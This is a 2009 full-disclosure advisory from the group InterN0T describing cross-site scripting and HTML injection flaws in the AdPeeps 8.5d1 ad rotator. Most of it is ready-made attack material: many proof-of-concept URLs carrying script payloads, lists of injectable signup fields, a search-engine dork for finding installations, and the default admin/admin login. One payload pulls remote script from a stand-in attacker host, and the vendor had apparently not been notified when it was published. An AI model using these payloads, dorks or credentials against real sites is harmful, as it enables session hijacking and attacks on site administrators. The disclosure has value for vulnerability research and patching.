[InterN0T] AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities
AdPeeps Ad Rotator - XSS and HTML Injection Vulnerabilities
Version Affected: 8.5d1 (3-18-09) (newest)
Info: Ad Peeps is a banner rotator and text ad rotator - all in one that allows
you to track, sell and manage banner ads, rich-media/flash ads and text ads
on your website. Built using PHP/MYSQL, Ad Peeps provides you and your
advertisers with highly detailed real-time statistics and is capable of
delivering millions of impressions per day on a typical shared web server. -
Plus, you can try it right now on your website with our 7 day trial.
Ad Peeps is so versatile that it can even show your text ads Yahoo! Style or
Google AdWords Style. Unlike many other banner ad rotator programs, Ad Peeps
was skillfully designed to use minimal server resources while maintaining speed
and unparalleled performance. Built on a highly scalable and versatile database
architecture, Ad Peeps works without fuss even on high traffic web sites and
won't crash your high powered website..
Opinion: AdPeeps, along with many others should really hire people to audit
their code.
Credits: Matt and all of InterN0T :-)
Googled0rk: (there might be more accurate d0rks)
intitle:"Advertisement Management Control Panel"
External Links:
http://www.adpeeps.com/
http://www.adpeeps.com/signup.html
http://demo.adpeeps.com/index.php?loc=adminlogin&uid=100000
Default Login:
admin / admin
-:: The Advisory ::-
Version Information:
http://www.website.tld/adpeeps/index.php?loc=adminlogin&uid=100000
Information Disclosure: (discloses the full path to the file)
http://www.website.tld/adpeeps/index.php?loc=view_adrates&uid=SomeRandomString
Vulnerable Function / ID Calls: (XSS)
uid, campainid, type, period, loginpass, accname, e9, from, subject & idno
Possible Filtered / Bad Chars: ' (quotes are semi-filtered too with a \
prepended, however this does not prevent XSS from being executed)
Cross Site Scripting: ( "><script>alert(0)</script> )
http://www.website.tld/adpeeps/index.php?uid="><script>alert(0)</script>
http://www.website.tld/adpeeps/index.php?loc=login_lookup&uid="><script>alert(0)</script>
http://www.website.tld/adpeeps/index.php?loc=adminlogin&uid="><script>alert(0)</script>
http://www.website.tld/adpeeps/index.php?loc=createcampaign&mode=new&uid=100000&campaignid="><script>alert(0)</script>
http://www.website.tld/adpeeps/index.php?loc=view_account_stats&uid=100000&type="><script>alert(2)</script>&period="><script>alert(1)</script>
http://www.website.tld/adpeeps/index.php?loc=view_adrates&uid="><script>alert(0)</script>
http://www.website.tld/adpeeps/index.php?loc=account_confirmation&accname="><script>alert(1)</script>&loginpass="><script>alert(2)</script>&uid=100000
http://www.website.tld/adpeeps/index.php?loc=setup_account&e6=new&e12=bypass&e9="><script>alert(0)</script>
http://www.website.tld/adpeeps/index.php?loc=email_advertisers&uid=100000&mode=1&errors=&from="><script>alert(1)</script>&message=&subject="><script>alert(2)</script>
http://www.website.tld/adpeeps/index.php?loc=edit_ad_package&uid=100000&idno="><script>alert(0)</script>
-- The Cross Site Scripting will most likely not survive any logins from what
our research results showed.
Affected Fields in the Signup Formular by HTML Injection:
- Advertiser Name
- First Name
- Last Name
- *Advertiser E-Mail
- Address
- Phone Number
- Password Hint
- URL to goto on click
*Was not tested but might be vulnerable.
Avoid HTML Injection In: (these fields gets sent to the administrator by e-mail)
Advertiser Name
First & Last Name
Advertiser E-mail
HTML Injection: : (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/adpeeps/index.php?loc=view_adrates&uid=100000
- One will have to buy a user / ad-spot in order to exploit this issue.
Affected Sites by HTML Injection: (where Advertiser Name, First- and Last-name
isn't used)
http://www.website.tld/adpeeps/index.php?loc=createcampaign&mode=edit&uid=100000&campaignid=VALIDID
(phone and passhint)
http://www.website.tld/adpeeps/index.php?loc=view_campaign_stats&uid=100000&campaignid=VALIDID
(address and phone)
http://www.website.tld/adpeeps/index.php?loc=view_ad_stats&uid=100000&campaignid=VALIDID&adno=VALIDID
(ad url)
http://www.website.tld/adpeeps/index.php?loc=createadvertad&campaignid=VALIDID&uid=100000&adno=VALIDID&adtype=banner
(ad url)
Affected Sites by HTML Injection: (where advertiser name is used)
http://www.website.tld/adpeeps/index.php?loc=view_account_stats&uid=100000&type=overall&period=all
http://www.website.tld/adpeeps/index.php?loc=mass_update_target_weight&uid=100000
http://www.website.tld/adpeeps/index.php?loc=orderhistory&uid=100000
http://www.website.tld/adpeeps/index.php?loc=email_advertisers&uid=100000&mode=1&errors=&from=&message=&subject=
http://www.website.tld/adpeeps/index.php?loc=campaignview&uid=100000&messagecode=void
http://www.website.tld/adpeeps/index.php?loc=previouslydeleted&uid=100000 <<
Only when the Admin has deleted the user and looks at this page!
http://www.website.tld/adpeeps/index.php?loc=createcampaign&mode=edit&uid=100000&campaignid=VALIDID
http://www.website.tld/adpeeps/index.php?loc=view_campaign_stats&uid=100000&campaignid=VALIDID
Affected Sites by HTML Injection: (which requires abnormal injection. (the
common alert(0) did not work))
http://www.website.tld/adpeeps/index.php?loc=createcampaign&mode=edit&uid=100000&campaignid=VALIDID
(first- and/or last-name)
http://www.website.tld/adpeeps/index.php?loc=email_advertisers&uid=100000&mode=1&errors=&from=&message=&subject=
(first- and/or last-name)
http://www.website.tld/adpeeps/index.php?loc=createcampaign&mode=edit&uid=100000&campaignid=VALIDID
(first- and/or last-name)
http://www.website.tld/adpeeps/index.php?loc=view_campaign_stats&uid=100000&campaignid=VALIDID
(first- and/or last-name)
The above "abnormal" injection we tested with was: "></td></tr></table><SCRIPT
SRC=http://evilsite.tld/xss.js></SCRIPT><!--
-:: Solution ::-
The most easy solution is to validate user input and strip or convert bad /
html characters.
Conclusion:
Even if One decides to (ab)use the Advertiser Name, First- and Last-name's as
injection points and the administrator sees this (in an e-mail), then he will
still be affected by the injection and possibly have a hard time deleting those
malicious users safely except if he might have NoScript turned on for his own
website. (the injection points might render the desired pages useless)
Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1049-intern0t-adpeeps-8-5d1-cross-site-scripting-html-injection-vulnerabilities.html
Disclosure Information:
- Vulnerabilities found 26th May 2009.
- Advisory finished and published on InterN0T th 27th May.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 27th May.
*AdPeeps will be contacted soon. (full disclosure rocks!)
All of the best,
MaXe